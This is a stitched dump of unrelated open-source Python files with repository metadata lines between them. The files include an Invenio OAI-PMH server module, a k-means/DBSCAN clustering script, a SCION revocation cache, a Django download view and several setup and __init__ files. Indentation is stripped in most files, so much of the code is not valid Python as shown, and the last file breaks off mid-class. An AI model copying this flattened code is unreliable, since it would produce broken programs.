provenance = X.about(body=provenance_body)
else:
provenance = ''
rights_body = get_record_rights(recid)
if rights_body:
rights = X.about(body=rights_body)
else:
rights = ''
else:
metadata = ''
provenance = ''
rights = ''
return X.record()(header, metadata, provenance, rights)
def oai_list_metadata_formats(argd):
"""Generates response to oai_list_metadata_formats verb."""
if argd.get('identifier'):
recid = oai_get_recid(argd['identifier'])
_record_exists = record_exists(recid)
if _record_exists != 1 and (_record_exists != -1 or CFG_OAI_DELETED_POLICY == "no"):
return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])])
out = ""
for prefix, (dummy, schema, namespace) in CFG_OAI_METADATA_FORMATS.items():
out += X.metadataFormat()(
X.metadataPrefix(prefix),
X.schema(schema),
X.metadataNamespace(namespace)
)
return oai_header(argd, "ListMetadataFormats") + out + oai_footer("ListMetadataFormats")
def oai_list_records_or_identifiers(req, argd):
"""Generates response to oai_list_records verb."""
verb = argd['verb']
resumption_token_was_specified = False
# check if the resumption_token did not expire
if argd.get('resumptionToken'):
resumption_token_was_specified = True
try:
cache = oai_cache_load(argd['resumptionToken'])
last_recid = cache['last_recid']
argd = cache['argd']
complete_list = cache['complete_list']
complete_list = filter_out_based_on_date_range(complete_list, argd.get('from', ''), argd.get('until', ''))
        except Exception as e:
# Ignore cache not found errors
if not isinstance(e, IOError) or e.errno != 2:
register_exception(alert_admin=True)
req.write(oai_error(argd, [("badResumptionToken", "ResumptionToken expired or invalid: %s" % argd['resumptionToken'])]))
return
else:
last_recid = 0
complete_list = oai_get_recid_list(argd.get('set', ""), argd.get('from', ""), argd.get('until', ""))
if not complete_list: # noRecordsMatch error
req.write(oai_error(argd, [("noRecordsMatch", "no records correspond to the request")]))
return
cursor = 0
for cursor, recid in enumerate(complete_list):
## Let's fast-forward the cursor to point after the last recid that was
## disseminated successfully
if recid > last_recid:
break
set_last_updated = get_set_last_update(argd.get('set', ""))
req.write(oai_header(argd, verb))
for recid in list(complete_list)[cursor:cursor+CFG_OAI_LOAD]:
req.write(print_record(recid, argd['metadataPrefix'], verb=verb, set_spec=argd.get('set'), set_last_updated=set_last_updated))
if list(complete_list)[cursor+CFG_OAI_LOAD:]:
resumption_token = oai_generate_resumption_token(argd.get('set', ''))
cache = {
'argd': argd,
'last_recid': recid,
# FIXME introduce IP check if you use fireroles for guests
'id_user': current_user.get_id(),
'complete_list': complete_list.fastdump(),
}
oai_cache_dump(resumption_token, cache)
expdate = oai_get_response_date(CFG_OAI_EXPIRE)
req.write(X.resumptionToken(expirationDate=expdate, cursor=cursor, completeListSize=len(complete_list))(resumption_token))
elif resumption_token_was_specified:
## Since a resumptionToken was used we shall put a last empty resumptionToken
req.write(X.resumptionToken(cursor=cursor, completeListSize=len(complete_list))(""))
req.write(oai_footer(verb))
oai_cache_gc()
def oai_list_sets(argd):
"""
Lists available sets for OAI metadata harvesting.
"""
out = ""
# note: no flow control in ListSets
sets = get_all_sets().values()
if not sets:
return oai_error(argd, [("noSetHierarchy", "No sets have been configured for this repository")])
for set_ in sets:
out += " <set>\n"
out += X.setSpec()(set_[0]) + X.setName()(set_[1])
if set_[2]:
out += X.setDescription()(set_[2])
out = out + " </set>\n"
return oai_header(argd, "ListSets") + out + oai_footer("ListSets")
def oai_get_record(argd):
"""Returns record 'identifier' according to 'metadataPrefix' format for OAI metadata harvesting.
- if record does not exist, return oai_error 'idDoesNotExist'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is
      'transient' or 'persistent', then return only header, with status
'deleted'.
- if record has been deleted and CFG_OAI_DELETED_POLICY is 'no',
then return oai_error 'idDoesNotExist'.
"""
recid = oai_get_recid(argd['identifier'])
_record_exists = record_exists(recid)
if _record_exists == 1 or \
(_record_exists == -1 and CFG_OAI_DELETED_POLICY != 'no'):
        out = print_record(recid, argd['metadataPrefix'])
out = oai_header(argd, "GetRecord") + out + oai_footer("GetRecord")
else:
return oai_error(argd, [("idDoesNotExist", "invalid record Identifier: %s" % argd['identifier'])])
return out
def oai_identify(argd):
"""Generates a response to oai_identify verb.
script_url - *str* URL of the script used to access the
service. This is made necessary since the gateway
can be accessed either via /oai2d or /oai2d/ (or for
backward compatibility: oai2d.py or oai2d.py/), and
that the base URL must be returned in the Identify
response
"""
out = X.repositoryName()(CFG_SITE_NAME)
out += X.baseURL()(CFG_SITE_URL + '/oai2d')
out += X.protocolVersion()("2.0")
out += X.adminEmail()(CFG_SITE_SUPPORT_EMAIL)
out += X.earliestDatestamp()(get_earliest_datestamp())
out += X.deletedRecord()(CFG_OAI_DELETED_POLICY)
out += X.granularity()("YYYY-MM-DDThh:mm:ssZ")
if CFG_WEBSTYLE_HTTP_USE_COMPRESSION:
out += X.compression()('deflate')
out += X.description("""<oai-identifier xmlns="http://www.openarchives.org/OAI/2.0/oai-identifier"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/oai-identifier
http://www.openarchives.org/OAI/2.0/oai-identifier.xsd">""" +
X.scheme()("oai") +
X.repositoryIdentifier()(CFG_OAI_ID_PREFIX) +
X.delimiter()(":") +
X.sampleIdentifier()(CFG_OAI_SAMPLE_IDENTIFIER) +
"""</oai-identifier>""")
out += CFG_OAI_IDENTIFY_DESCRIPTION % {'CFG_SITE_URL': EscapedXMLString(CFG_SITE_URL)}
if CFG_OAI_FRIENDS:
friends = """<friends xmlns="http://www.openarchives.org/OAI/2.0/friends/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/friends/
http://www.openarchives.org/OAI/2.0/friends.xsd">"""
for baseurl in CFG_OAI_FRIENDS:
friends += X.baseURL()(baseurl)
friends += """</friends>"""
out += X.description(friends)
out = oai_header(argd, "Identify") + out + oai_footer("Identify")
return out
def get_utc_now():
"""
Return current UTC time in the OAI-PMH format.
"""
return datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
def oai_build_request_element(argd=None):
"""
Build the request tag.
"""
if argd is None:
argd = {}
return X.responseDate()(get_utc_now()) + X.request(**argd)("%s/oai2d" % CFG_SITE_URL)
def oai_get_request_url():
"""Generates requesturl tag for OAI."""
requesturl = CFG_SITE_URL + "/oai2d"
return requesturl
def oai_get_response_date(delay=0):
"""Generates responseDate tag for OAI."""
return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(time.time() + delay))
def oai_get_recid(identifier):
"""Returns the recid corresponding to the OAI identifier. Prefer a non deleted
record if multiple recids matches but some of them are deleted (e.g. in
case of merging). Returns None if no record matches."""
if identifier:
recids = Query('{f}:"{p}"'.format(
f=CFG_OAI_ID_FIELD, p=identifier)
).search()
if recids:
for recid in recids:
if record_exists(recid) > 0:
return recid
return None
def get_set_last_update(set_spec=""):
"""
Returns the last_update of a given set (or of all sets) in UTC
"""
if set_spec:
last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)') + """ FROM "oaiREPOSITORY" WHERE setSpec=%s""", (set_spec, ))[0][0]
else:
last_update = run_sql("SELECT " + datetime_format('MAX(last_updated)', False) + """ FROM "oaiREPOSITORY" """)[0][0]
if last_update:
return localtime_to_utc(last_update)
else:
return None
def filter_out_based_on_date_range(recids, fromdate="", untildate="", set_spec=None):
""" Filter out recids based on date range."""
if fromdate:
fromdate = normalize_date(fromdate, "T00:00:00Z")
else:
fromdate = get_earliest_datestamp()
fromdate = utc_to_localtime(fromdate)
if untildate:
untildate = normalize_date(untildate, "T23:59:59Z")
else:
untildate = get_latest_datestamp()
untildate = utc_to_localtime(untildate)
    if set_spec is not None: ## either it has a value or it is empty, thus meaning all records
last_updated = get_set_last_update(set_spec)
if last_updated is not None:
last_updated = utc_to_localtime(last_updated)
if last_updated > fromdate:
fromdate = utc_to_localtime(get_earliest_datestamp())
recids = intbitset(recids) ## Let's clone :-)
if fromdate and untildate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date BETWEEN %s AND %s", (fromdate, untildate)))
elif fromdate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date >= %s", (fromdate, )))
elif untildate:
recids &= intbitset(run_sql("SELECT id FROM bibrec WHERE modification_date <= %s", (untildate, )))
return recids
def oai_get_recid_list(set_spec="", fromdate="", untildate=""):
"""
Returns list of recids for the OAI set 'set', modified from 'fromdate' until 'untildate'.
"""
ret = intbitset()
if not set_spec:
ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY != 'no':
ret |= search_unit_in_bibxxx(p='*', f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
else:
ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_SET_FIELD, m='e')
ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY != 'no':
ret |= search_unit_in_bibxxx(p=set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
ret |= search_unit_in_bibxxx(p='%s:*' % set_spec, f=CFG_OAI_PREVIOUS_SET_FIELD, m='e')
if CFG_OAI_DELETED_POLICY == 'no':
ret -= search_unit_in_bibxxx(p='DELETED', f='980__%', m='e')
if CFG_CERN_SITE:
ret -= search_unit_in_bibxxx(p='DUMMY', f='980__%', m='e')
return filter_out_based_on_date_range(ret, fromdate, untildate, set_spec)
def oai_generate_resumption_token(set_spec):
"""Generates unique ID for resumption token management."""
fd, name = tempfile.mkstemp(dir=os.path.join(CFG_CACHEDIR, 'RTdata'), prefix='%s___' % set_spec)
os.close(fd)
return os.path.basename(name)
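## For a set_spec such as "math:alg" this yields a token file named roughly
## "math:alg___Xa3fQz" under CFG_CACHEDIR/RTdata (the suffix is random,
## courtesy of tempfile.mkstemp).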
def oai_delete_resumption_tokens_for_set(set_spec):
"""
In case a set is modified by the admin interface, this will delete
any resumption token that is now invalid.
"""
aset = set_spec
    while aset:
        for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '%s___*' % aset)):
            os.remove(name)
        aset = aset.rsplit(":", 1)[0] if ":" in aset else ""
for name in iglob(os.path.join(CFG_CACHEDIR, 'RTdata', '___*')):
os.remove(name)
def oai_cache_dump(resumption_token, cache):
    """
    Given a resumption_token and the cache, stores the cache.
    """
    with open(os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token), 'wb') as f:
        cPickle.dump(cache, f, -1)
def oai_cache_load(resumption_token):
"""Restore the cache from the resumption_token."""
fullpath = os.path.join(CFG_CACHEDIR, 'RTdata', resumption_token)
if os.path.dirname(os.path.abspath(fullpath)) != os.path.abspath(
os.path.join(CFG_CACHEDIR, 'RTdata')):
raise ValueError("Invalid path")
    with open(fullpath, 'rb') as f:
        cache = cPickle.load(f)
if cache.get('id_user', 0) == current_user.get_id():
return cache
abort(401)
def oai_cache_gc():
"""
OAI Cache Garbage Collector.
"""
cache_dir = os.path.join(CFG_CACHEDIR, 'RTdata')
if not os.path.isdir(cache_dir):
os.makedirs(cache_dir)
for file_ in os.listdir(cache_dir):
filename = os.path.join(cache_dir, file_)
# cache entry expires when not modified during a specified period of time
if ((time.time() - os.path.getmtime(filename)) > CFG_OAI_EXPIRE):
try:
os.remove(filename)
            except OSError:
# Most probably the cache was already deleted
pass
def get_all_sets():
"""
Return all the sets.
"""
res = run_sql("""SELECT "setSpec", "setName", "setDescription"
FROM "oaiREPOSITORY" """)
ret = {}
for row in res:
ret[row[0]] = row
## Let's expand with all the set that exist in the DB
for a_set in get_all_field_values(CFG_OAI_SET_FIELD):
if a_set not in ret:
ret[a_set] = (a_set, a_set, '')
## Let's expand with all the supersets
for a_set in ret.keys():
while ':' in a_set:
            a_set = a_set.rsplit(":", 1)[0]
if a_set not in ret:
ret[a_set] = (a_set, a_set, '')
if CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC in ret:
## Let's remove the special global set
del ret[CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC]
if '' in ret:
## '' is not a valid setSpec but might be in the MARC
del ret['']
return ret
def check_argd(argd):
"""
Check OAI arguments
Also transform them from lists to strings.
"""
errors = []
## no several times the same argument
bad_arguments_error = False
for param, value in iteritems(argd):
if len(value) > 1 and not bad_arguments_error:
errors.append(("badArgument", "More than one value specified for the %s argument: %s" % (param, value)))
bad_arguments_error = True ## This is needed only once
if len(value) > 0:
argd[param] = value[0]
else:
argd[param] = ''
## principal argument required
if argd['verb'] not in CFG_VERBS:
errors.append(("badVerb", "Illegal OAI verb: %s" % argd['verb']))
## defined argd
for param in argd.keys():
        if param not in CFG_VERBS.get(argd['verb'], []) and param != 'verb' \
and not bad_arguments_error:
errors.append(("badArgument", "The request includes illegal arguments for the given verb: %s" % param))
bad_arguments_error = True
break # Indicate only once
## resumptionToken exclusive
if argd.get('resumptionToken', '') != "" and \
len(argd.keys()) != 2 and not bad_arguments_error:
errors.append(("badArgument", "The resumptionToken was specified together with other arguments"))
bad_arguments_error = True
if argd.get('resumptionToken', None) == '':
errors.append(("badResumptionToken", "ResumptionToken invalid: %s" % argd.get('resumptionToken', None)))
## datestamp formats
if 'from' in argd and \
'from' in CFG_VERBS.get(argd['verb'], []):
from_length = len(argd['from'])
if check_date(argd['from']) == "":
errors.append(("badArgument", "Bad datestamp format in from: %s" % argd['from']))
else:
from_length = 0
if 'until' in argd and \
'until' in CFG_VERBS.get(argd['verb'], []):
until_length = len(argd['until'])
if check_date(argd['until']) == "":
errors.append(("badArgument", "Bad datestamp format in until: %s" % argd['until']))
else:
until_length = 0
if from_length != 0:
if until_length != 0:
if from_length != until_length:
errors.append(("badArgument", "From and until have two different formats: %s Vs. %s" % (from_length, until_length)))
if 'from' in argd and 'until' in argd \
and argd['from'] > argd['until'] and \
'from' in CFG_VERBS.get(argd['verb'], []) and \
'until' in CFG_VERBS.get(argd['verb'], []):
errors.append(("badArgument", "from argument comes after until argument: %s > %s" % (argd['from'], argd['until'])))
## Identify exclusive
if argd['verb'] == "Identify" and \
len(argd.keys()) != 1:
if not bad_arguments_error: # Do not repeat this error
errors.append(("badArgument", "The request includes illegal arguments"))
bad_arguments_error = True
## parameters for GetRecord
if argd['verb'] == "GetRecord" and \
'identifier' not in argd:
errors.append(("badArgument", "Record identifier missing"))
if argd['verb'] == "GetRecord" and \
'metadataPrefix' not in argd:
errors.append(("badArgument", "Missing metadataPrefix"))
## parameters for ListRecords and ListIdentifiers
if (argd['verb'] == "ListRecords" or argd['verb'] == "ListIdentifiers") and \
('resumptionToken' not in argd and 'metadataPrefix' not in argd):
errors.append(("badArgument", "Missing metadataPrefix"))
## Metadata prefix defined and valid
if 'metadataPrefix' in argd and \
not argd['metadataPrefix'] in CFG_OAI_METADATA_FORMATS:
errors.append(("cannotDisseminateFormat", "Chosen format is not supported. Valid formats are: %s" % ', '.join(CFG_OAI_METADATA_FORMATS.keys())))
return errors
def oai_profile():
"""
Runs a benchmark
"""
from six import StringIO
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListRecords"})
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "marcxml", "verb" :"ListRecords"})
oai_list_records_or_identifiers(StringIO(), argd={"metadataPrefix": "oai_dc", "verb": "ListIdentifiers"})
return
if __name__ == "__main__":
import profile
import pstats
profile.run('oai_profile()', "oai_profile")
p = pstats.Stats("oai_profile")
p.strip_dirs().sort_stats("cumulative").print_stats()
| ludmilamarian/invenio | invenio/legacy/oairepository/server.py | Python | gpl-2.0 | 34,384 | 0.006893 |
# clustering.py
# cluster yelp and TA data
#
# Rob Churchill
#
# NOTE: IN ORDER TO GET ANY VISUALIZATIONS OUT OF THIS SCRIPT,
# YOU MUST PUT THIS IN AN IPYTHON NOTEBOOK OR SOMETHING SIMILAR
#
# NOTE: I learned to do this in my data science class last semester. If you are looking for plagiarism things, you will almost certainly find similar clustering code.
# I did not copy it; I learned this specific way of doing it, and referred to my previous assignments when doing it for this project. If you would like to see my previous
# assignments, I will provide them on request. Otherwise, I don't think that it's worth adding a lot of extra files for the sole sake of showing that I haven't plagiarized.
import scipy as sp
import numpy as np
import math
from sklearn.cluster import KMeans
import scipy.cluster.hierarchy as hr
from sklearn.cluster import DBSCAN
import csv
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
folder = 'data/'
file_names = ['yelp_data.csv', 'trip_advisor_data.csv']
yelp_dataset = list()
#change the index of file_names in this line to 0 if you want to cluster yelp, 1 if you want to cluster trip advisor
with open(folder+file_names[1], 'r') as f:
reader = csv.reader(f)
for line in reader:
yelp_dataset.append(line)
# remove headers
yelp_dataset.remove(yelp_dataset[0])
# throw out the fields we don't need so that we have enough memory to cluster such a large dataset
new_yelp_ds = []
for y in yelp_dataset:
local = 0
if y[19] == "TRUE":
local = 1
if y[19] in ["FALSE", "TRUE"]:
for l in range(0, len(y)):
if y[l] == "NA":
y[l] = 0
if int(y[11]) > 99:
            # features: mean_rating, log(distance+1), log(y[6]+1)
y = [float(y[21]), math.log(float(y[18])+1), math.log(int(y[6])+1)]
new_yelp_ds.append(y)
# this condensed dataset is now our working dataset
yelp_dataset = np.array(new_yelp_ds)
print len(yelp_dataset)
#print np.amax(yelp_dataset[:,1])
# start kmeans. try it with 1...11 clusters to see which is best. for both, it was two.
error = np.zeros(11)
error[0] = 0
for k in range(1,11):
kmeans = KMeans(n_clusters=k)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error[k] = kmeans.inertia_
plt.plot(range(1,len(error)),error[1:])
plt.xlabel('Number of clusters')
plt.ylabel('Error')
# run kmeans on the optimal k
kmeans = KMeans(n_clusters=2, n_init=15)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error = kmeans.inertia_
print labels
print error
# make it pretty and plot it. kmeans told us literally nothing about this dataset.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# set up dbscan, set the eps based on the website
# for yelp, use 0.25. For trip advisor use 0.5
dbscan = DBSCAN(eps = 0.5)
# run dbscan on the data
dbscan.fit_predict(yelp_dataset)
labels = dbscan.labels_
print labels
# make it pretty and plot it. dbscan highlights some major grouping of reviews in the data,
# especially the local and non-local groups.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# hierarchical clustering is a very memory consuming algorithm, so we can only take a small subset of the dataset
# we randomly permute and take the first 1000.
permutation = np.random.permutation(yelp_dataset)
small_ds = permutation[:1000]
# run the algorithm on our data
Z = hr.linkage(small_ds, method='complete', metric='euclidean')
print Z.shape, small_ds.shape
# plot the dendrogram to see how the clusters were created.
fig = plt.figure(figsize=(10,10))
T = hr.dendrogram(Z,color_threshold=0.4, leaf_font_size=1)
fig.show()
# cluster our data and get the labels for plotting.
labels = hr.fcluster(Z, t=7, depth=8)
#print labels
# make it pretty and plot it. hierarchical clustering, like kmeans, showed us nothing interesting.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('r')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0) | rchurch4/georgetown-data-science-fall-2015 | analysis/clusterings/clustering.py | Python | mit | 4,732 | 0.01585 |
# descriptors.__init__
#
# Expose Descriptor, Validated, and all descriptors so they can be
# imported via "from descriptors import ..."
from __future__ import print_function, unicode_literals, division
from descriptors.Descriptor import Descriptor
from descriptors.Validated import Validated
import descriptors.handmade as hm
import descriptors.massproduced as mm
_all_descriptors = set([
(obj_name, obj)
for module in (hm, mm)
for obj_name, obj in module.__dict__.items()
if obj.__class__.__name__ == "DescriptorMeta"])
_all_descriptors.discard(("Descriptor", Descriptor))
globals().update(_all_descriptors)
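# After the globals() update above, every class from handmade/massproduced
# whose metaclass is DescriptorMeta is importable directly from the package,
# e.g. "from descriptors import Typed" -- "Typed" is purely illustrative, the
# real names depend on what those two modules define.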
| noutenki/descriptors | descriptors/__init__.py | Python | mit | 631 | 0 |
# Copyright 2008 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from webdav.acp.Acl import ACL
from webdav.acp.Ace import ACE
from webdav.acp.GrantDeny import GrantDeny
from webdav.acp.Privilege import Privilege
from webdav.acp.Principal import Principal
__version__ = "$LastChangedRevision: 2 $"
| antont/tundra | src/Application/PythonScriptModule/pymodules_old/lib/webdav/acp/__init__.py | Python | apache-2.0 | 829 | 0 |
from setuptools import setup
setup(
name="mbtapy",
version='0.1.0dev1',
description='Python bindings for the MBTA-REALTIME API (v2)',
author="Joseph Dougherty",
author_email="[email protected]",
url='https://github.com/JDougherty/mbtapy',
install_requires=['requests'],
license='LICENSE',
packages=['mbtapy'],
)
| JDougherty/mbtapy | setup.py | Python | apache-2.0 | 355 | 0.002817 |
# Copyright 2017 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:mod:`rev_cache` --- Cache for revocations
==========================================
"""
# Stdlib
import logging
import threading
# External
from prometheus_client import Counter, Gauge
# SCION
from lib.crypto.hash_tree import ConnectedHashTree
# Exported metrics.
REVS_TOTAL = Gauge("rc_revs_total", "# of cached revocations", ["server_id", "isd_as"])
REVS_BYTES = Gauge("rc_revs_bytes", "RevCache memory usage", ["server_id", "isd_as"])
REVS_ADDED = Counter("rc_revs_added_total", "Total revocations added",
["server_id", "isd_as"])
REVS_REMOVED = Counter("rc_revs_removed_total", "Total revocations removed",
["server_id", "isd_as"])
def _mk_key(rev_info):
"""Returns the key for a RevocationInfo object."""
return (rev_info.isd_as(), rev_info.p.ifID)
class RevCache:
"""Thread-safe cache for revocations with auto expiration of entries."""
def __init__(self, capacity=1000, labels=None): # pragma: no cover
"""
:param dict labels:
Labels added to the exported metrics. The following labels are supported:
- server_id: A unique identifier of the server that is exporting
- isd_as: The ISD_AS of where the server is running
- type: A generic label for the type of the revocations.
"""
self._cache = {}
self._lock = threading.RLock()
self._capacity = capacity
self._labels = labels
if self._labels:
self._init_metrics()
def _init_metrics(self): # pragma: no cover
REVS_TOTAL.labels(**self._labels).set(0)
REVS_BYTES.labels(**self._labels).set(0)
REVS_ADDED.labels(**self._labels).inc(0)
REVS_REMOVED.labels(**self._labels).inc(0)
def __contains__(self, rev_info): # pragma: no cover
return self.contains_key(_mk_key(rev_info))
def contains_key(self, key): # pragma: no cover
with self._lock:
stored_info = self._cache.get(key)
return stored_info and self._validate_entry(stored_info)
def __getitem__(self, key): # pragma: no cover
return self.get(key)
def get(self, key, default=None):
with self._lock:
try:
rev_info = self._cache[key]
except KeyError:
return default
if self._validate_entry(rev_info):
return rev_info
return default
def add(self, rev_info):
"""
Adds rev_info to the cache and returns True if the operation succeeds.
"""
if ConnectedHashTree.verify_epoch(rev_info.p.epoch) != ConnectedHashTree.EPOCH_OK:
return False
with self._lock:
key = _mk_key(rev_info)
stored_info = self.get(key)
if not stored_info:
# Try to free up space in case the cache reaches the cap limit.
if len(self._cache) >= self._capacity:
for info in list(self._cache.values()):
self._validate_entry(info)
# Couldn't free up enough space...
if len(self._cache) >= self._capacity:
                    logging.error("Revocation cache full!")
return False
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info))
return True
if rev_info.p.epoch > stored_info.p.epoch:
self._cache[key] = rev_info
if self._labels:
REVS_ADDED.labels(**self._labels).inc()
REVS_REMOVED.labels(**self._labels).inc()
REVS_BYTES.labels(**self._labels).inc(len(rev_info) - len(stored_info))
return True
return False
def _validate_entry(self, rev_info, cur_epoch=None): # pragma: no cover
"""Removes an expired revocation from the cache."""
if (ConnectedHashTree.verify_epoch(rev_info.p.epoch, cur_epoch) !=
ConnectedHashTree.EPOCH_OK):
del self._cache[_mk_key(rev_info)]
if self._labels:
REVS_REMOVED.labels(**self._labels).inc()
REVS_TOTAL.labels(**self._labels).dec()
REVS_BYTES.labels(**self._labels).dec(len(rev_info))
return False
return True
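# Illustrative usage (a real lib.packet RevocationInfo is required, so this is
# only a sketch; labels follow the docstring above):
#
#   cache = RevCache(capacity=500,
#                    labels={"server_id": "bs-1", "isd_as": "1-ff00:0:110"})
#   if cache.add(rev_info):                 # rejected when the epoch is stale
#       assert cache.get(_mk_key(rev_info)) is rev_info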
| FR4NK-W/osourced-scion | python/lib/rev_cache.py | Python | apache-2.0 | 5,118 | 0.001172 |
__author__ = 'romilly'
v1 = 1.0
v2 = 1.0
n1 = 1
while v2 > 10e-6:
v2 = v2 / n1
v1 = v1 + v2
n1 = n1 + 1
print v1
| romilly/pegasus-autocode | autocode/firstprog.py | Python | mit | 126 | 0 |
#!/usr/bin/env python3
"""inject_repos.py - CI secret repos injection.
"""
import yaml
from lxml import etree
from lxml.etree import ElementTree as ET
import argparse
from six import iteritems
def main():
repos_file, beaker_file = parse_args()
repos = load_secret_data(repos_file)
inject_repos(repos, beaker_file)
def parse_args():
description_msg = 'Resolve and filter secret data'
parser = argparse.ArgumentParser(description=description_msg)
parser.add_argument(
"-f", "--secret-file", type=str,
help=("Path to secret file.")
)
parser.add_argument(
"-b", "--beaker-file", type=str,
help=("Path to beaker file.")
)
args = parser.parse_args()
return args.secret_file, args.beaker_file
def load_secret_data(file_to_load=None):
"""Load yaml file from a given location
:param str file_to_load: (optional) Path to the file we need to load.
    :rtype: dict
    :returns: A dict with the file's data (inject_repos expects a mapping of
        repo names to URLs). An empty list if the file could not be read.
"""
try:
with open(file_to_load, 'r') as sf:
return yaml.safe_load(sf)
except IOError:
return []
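# The secret file is expected to be a flat mapping of repo names to URLs,
# for example (values illustrative):
#
#   extra-rpms: http://example.com/repos/extra-rpms
#   hotfixes: http://example.com/repos/hotfixes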
def inject_repos(repos, beaker_file):
parser = etree.XMLParser(strip_cdata=False)
tree = etree.parse(beaker_file, parser)
root = tree.getroot()
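    # root[1][0][4] below addresses the element that holds <repo> entries in
    # the beaker job XML this script expects; the lookup is purely positional,
    # so the layout of the input file matters.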
for repo_name, url in iteritems(repos):
etree.SubElement(root[1][0][4], "repo",
attrib={"name": repo_name, "url": url})
tree.write(
beaker_file, pretty_print=True,
xml_declaration=True, encoding="utf-8"
)
if __name__ == "__main__":
main()
| oVirt/jenkins | stdci_libs/inject_repos.py | Python | gpl-3.0 | 1,611 | 0.003724 |
########################################################################################################################
# VECNet CI - Prototype
# Date: 03/21/2014
# Institution: University of Notre Dame
# Primary Authors:
# Robert Jones <[email protected]>
########################################################################################################################
from django.core.exceptions import ObjectDoesNotExist
from django.http import HttpResponse, HttpResponseBadRequest
from lib.templatetags.base_extras import set_notification
def download_view(request, file_type=None):
"""
## View for file downloads ##
- Given a file_type, return the file of that type from the scenario in the session.
filetypes = [
'air binary',
'air json',
'humidity binary',
'humidity json',
'land_temp binary',
'land_temp json',
'rainfall binary',
'rainfall json',
'config',
'campaign',
'demographics',
]
"""
if file_type is None:
return HttpResponseBadRequest('No file selected for download.')
    if 'scenario' not in request.session:
return HttpResponseBadRequest('No scenario selected to download from.')
try:
my_file = request.session['scenario'].get_file_by_type(file_type)
except ObjectDoesNotExist:
set_notification('alert-error', '<strong>Error!</strong> File does not exist.', request.session)
return HttpResponseBadRequest('Scenario does not contain a file of this type.')
response = HttpResponse(mimetype='text/plain')
response['Content-Disposition'] = 'attachment; filename="%s"' % my_file.file_name
response.write(my_file.content)
return response | vecnet/vnetsource | ts_emod/views/DownloadView.py | Python | mpl-2.0 | 1,812 | 0.004415 |
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext' : build_ext},
ext_modules=[Extension("_snaphu",
sources=["_snaphu.pyx",
"../src/snaphu.c",
"../src/snaphu_solver.c",
"../src/snaphu_util.c",
"../src/snaphu_cost.c",
"../src/snaphu_cs2.c",
"../src/snaphu_io.c",
"../src/snaphu_tile.c"],
include_dirs=['../src'],
extra_compile_args=['-Wstrict-prototypes', ],
language="c")]
)
| bosmanoglu/adore-doris | lib/ext/snaphu-v1.4.2/cython/setup.py | Python | gpl-2.0 | 550 | 0.027273 |
"""
JsonCli: Library for CLI based on JSON
--------------------------------------
+-------------------------------------+
| This is the JsonCli common library. |
+-------------------------------------+
"""
import argparse
from collections import OrderedDict
from argcomplete import autocomplete
from botocore import xform_name
type_map = {
'structure': str,
'map': str,
'timestamp': str,
'list': str,
'string': str,
'float': float,
'integer': int,
'long': int,
'boolean': bool,
'double': float,
'blob': str}
class OrderNamespace(argparse.Namespace):
"""
Namespace with Order: from argparse.Namespace
"""
__order__ = OrderedDict()
def __init__(self, **kwargs):
